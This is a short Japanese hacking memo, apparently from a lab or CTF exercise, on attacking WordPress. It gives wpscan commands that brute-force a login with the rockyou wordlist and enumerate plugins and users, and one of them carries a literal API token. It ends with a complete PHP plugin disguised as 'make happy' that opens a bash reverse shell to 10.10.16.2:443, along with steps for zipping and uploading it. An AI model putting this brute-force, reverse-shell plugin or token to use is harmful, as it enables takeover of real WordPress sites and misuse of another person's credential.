wpscanでWordpressのbruteforce
Wpscanによるwordpressログインのbruteforce
code:code
wpscan --url http://10.10.10.37/ -U notch -P rockyou.txt
※ -Uや-Pはリストファイルを渡してもよい。
https://scrapbox.io/files/62a9c8279882130023f9926f.png
ちなみにWordpressのログインページのrequest raw dataは
Devtool > Network > right click POST request > Copy > Copy as cURL > sed -e "s/'//g" -e 's/-H//g' -e 's/\\//g'
HackTricks Wordpress
一応wpscanのメモ:
code:bash:
wpscan --rua -e ap,at,cb,dbe,u,m --url http://10.10.10.37 --api-token MNDr5ESRVXa10ptdSMk7zx3o0poacKKDhZX43vVErPw -o wpscanresult.txt
--rua: Random User Agent
-e : enumeration
ap : All Plugins
at : All Themes
cb : Config backups
dbe : Db Exports
m : Media IDs range
--api-token : from https://wpscan.com/
get a shell by malicious plugin
c.f. WORDPRESS PLUGIN : REVERSE SHELL (SEVENLAYERS)
code:php
<?php
/*
Plugin Name: make happy
Plugin URI: http://www.example.com/plugin
Description: give us happy
Author: shoebill
Version: 0.1
Author URI: http://www.example.com
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.2/443 0>&1'")
?>
zip化する:
code:bash
zip mal.zip mal.php
その後、Wrdpress上で
Plugins > Add New > UploadPlugin
#bruteforce
#wordpress